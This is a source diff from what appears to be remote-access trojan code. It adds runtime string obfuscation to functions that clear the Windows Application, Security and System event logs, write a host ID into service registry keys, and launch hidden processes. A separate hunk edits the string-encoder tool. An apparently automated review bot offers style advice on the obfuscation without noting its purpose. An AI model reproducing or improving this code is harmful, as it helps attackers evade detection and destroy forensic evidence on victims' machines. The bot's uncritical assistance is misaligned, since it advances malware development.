||||
|
||||
|
||||
char *lpSubKey = pApplications;
|
||||
HKEY hKey;
|
||||
char strIEPath[MAX_PATH];
|
||||
LONG nSize = sizeof(strIEPath);
|
||||
@@ -205,7 +227,15 @@ bool OpenURL(LPCTSTR lpszURL, INT nShowCmd)
|
||||
memset(strIEPath, 0, sizeof(strIEPath));
|
||||
|
||||
if (RegOpenKeyEx(HKEY_CLASSES_ROOT, lpSubKey, 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
|
||||
{
|
||||
memset(pApplications, 0, Applications[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pApplications;
|
||||
return false;
|
||||
}
|
||||
memset(pApplications, 0, Applications[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pApplications;
|
||||
|
||||
|
||||
RegQueryValue(hKey, NULL, strIEPath, &nSize);
|
||||
RegCloseKey(hKey);
|
||||
|
||||
@@ -221,17 +251,35 @@ bool OpenURL(LPCTSTR lpszURL, INT nShowCmd)
|
||||
STARTUPINFO si = {0};
|
||||
PROCESS_INFORMATION pi;
|
||||
si.cb = sizeof si;
|
||||
|
||||
//strcry
|
||||
char WinSta0[] = { 0x0f,0x9c,0xa3,0xa7,0x9b,0xb3,0xa7,0xf5,0x98,0x87,0xa7,0xa7,0xa1,0xca,0xd2,0xc9 }; //WinSta0\Default
|
||||
char* pWinSta0 = decodeStr(WinSta0); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
|
||||
if (nShowCmd != SW_HIDE)
|
||||
si.lpDesktop = "WinSta0\\Default";
|
||||
si.lpDesktop = pWinSta0;
|
||||
|
||||
CreateProcess(NULL, strIEPath, NULL, NULL, false, 0, NULL, NULL, &si, &pi);
|
||||
|
||||
memset(pWinSta0, 0, WinSta0[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pWinSta0;
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void CleanEvent()
|
||||
{
|
||||
char *strEventName[] = {"Application", "Security", "System"};
|
||||
//strcry Application Security System
|
||||
char Application[] = { 0x0b,0x8a,0xba,0xb9,0xa4,0xae,0xa5,0xa4,0xb0,0xaa,0xad,0xaf };
|
||||
char Security[] = { 0x08,0x98,0xaf,0xaa,0xbd,0xb5,0xaf,0xb1,0xbd };
|
||||
char System[] = { 0x98,0xb3,0xba,0xbc,0xa2,0xab };
|
||||
|
||||
char *strEventName[3];
|
||||
strEventName [0] = decodeStr(Application);
|
||||
strEventName [1] = decodeStr(Security);
|
||||
strEventName [2] = decodeStr(System);
|
||||
|
||||
for (int i = 0; i < sizeof(strEventName) / sizeof(int); i++)
|
||||
{
|
||||
@@ -241,14 +289,35 @@ void CleanEvent()
|
||||
ClearEventLog(hHandle, NULL);
|
||||
CloseEventLog(hHandle);
|
||||
}
|
||||
memset(strEventName[0], 0, Application[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete strEventName[0];
|
||||
memset(strEventName[1], 0, Security[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete strEventName[1];
|
||||
memset(strEventName[2], 0, System[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete strEventName[2];
|
||||
}
|
||||
|
||||
void SetHostID(LPCTSTR lpServiceName, LPCTSTR lpHostID)
|
||||
{
|
||||
char strSubKey[1024];
|
||||
memset(strSubKey, 0, sizeof(strSubKey));
|
||||
wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName);
|
||||
|
||||
|
||||
//strcry SYSTEM\CurrentControlSet\Services\%s
|
||||
char Services[] = { 0x24,0x98,0x93,0x9a,0x9c,0x82,0x8b,
|
||||
0x99,0x87,0xb6,0xb0,0xb3,0xa5,0xd1,0xca,0xfe,0xd3,
|
||||
0xd5,0xce,0xcb,0xd7,0xdb,0xe5,0xd0,0xc0,0xef,0xe1,
|
||||
0xd4,0xc2,0xd9,0xc7,0xce,0xc9,0xd8,0xf6,0x8c,0xdb }; //WinSta0\Default
|
||||
char* pServices = decodeStr(Services); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
//wsprintf(strSubKey, "SYSTEM\CurrentControlSet\Services\%s", lpServiceName);
|
||||
wsprintf(strSubKey, pServices, lpServiceName);
|
||||
WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Host", REG_SZ, (char *)lpHostID, lstrlen(lpHostID), 0);
|
||||
|
||||
memset(pServices, 0, Services[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pServices;
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
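Review bot: `UpdateServer` and `SetHostID` keep the statements they replace as commented-out code (`//si.lpDesktop = "WinSta0\\Default";` and `//wsprintf(strSubKey, "SYSTEM\CurrentControlSet\Services\%s", lpServiceName);`), and the second copy has single backslashes, so it no longer matches the literal that was removed. The `//strcry` comment above each table already records the plaintext, so I would delete the commented-out lines rather than keep a second, diverging copy; the same leftover is in `GetHostRemark` in the previous section. The new local `trueOrFales` in `UpdateServer` is misspelt and says nothing about what it holds; `bool bCreated = CreateProcess(...)` followed by `return bCreated;` reads more clearly.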
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -39,10 +39,10 @@ char* uncode(char* str)
|
||||
|
||||
int main()
|
||||
{
|
||||
char a[] = "Mozilla/4.0 (compatible)";
|
||||
char b[] = "VideoCapWindow";
|
||||
char c[] = "LyxInstaller.exe";
|
||||
char d[] = "%-24s %-15s 0x%x";
|
||||
char a[] = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
|
||||
char b[] = "Security";
|
||||
char c[] = "System";
|
||||
char d[] = "Application";
|
||||
char* s1 = crycode(a);
|
||||
char* s2 = crycode(b);
|
||||
char* s3 = crycode(c);
|
||||
|